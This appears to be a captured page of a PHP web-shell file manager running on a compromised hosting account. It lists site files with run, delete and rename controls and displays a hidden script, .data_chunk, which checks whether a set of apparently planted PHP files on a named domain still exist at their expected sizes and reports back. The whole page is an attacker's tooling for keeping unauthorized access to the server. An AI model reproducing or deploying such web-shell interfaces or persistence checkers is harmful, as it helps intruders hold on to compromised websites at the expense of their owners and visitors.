at path:
ROOT
/
.data_chunk
run:
R
W
Run
.data_chunk
855 By
2026-02-23 21:26:56
R
W
Run
Delete
Rename
.htaccess
233 By
2026-02-12 08:30:39
R
W
Run
Delete
Rename
error_log
3.11 MB
2026-02-24 18:30:40
R
W
Run
Delete
Rename
robots.txt
68 By
2026-02-12 08:34:31
R
W
Run
Delete
Rename
simple.php
15.05 KB
2026-02-12 08:30:39
R
W
Run
Delete
Rename
error_log
up
📄
.data_chunk
Save
<?php $r = '/home/lantniyh/voguevaultng.com'; $x = ["/canonical.php"=>"bd@@342663@@898", "/xml_domit_xpath.php"=>"bd@@352655@@952", "/masterResources.php"=>"bd@@357618@@994", "/xml.php"=>"bd@@354318@@603", "/estero.php"=>"bd@@341350@@34", "/xml.php"=>"bd@@355512@@70", "/canonical.php"=>"bd@@355537@@61", "/xml_domit_xpath.php"=>"bd@@355564@@59", "/estero_mod.php"=>"bd@@341351@@39"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');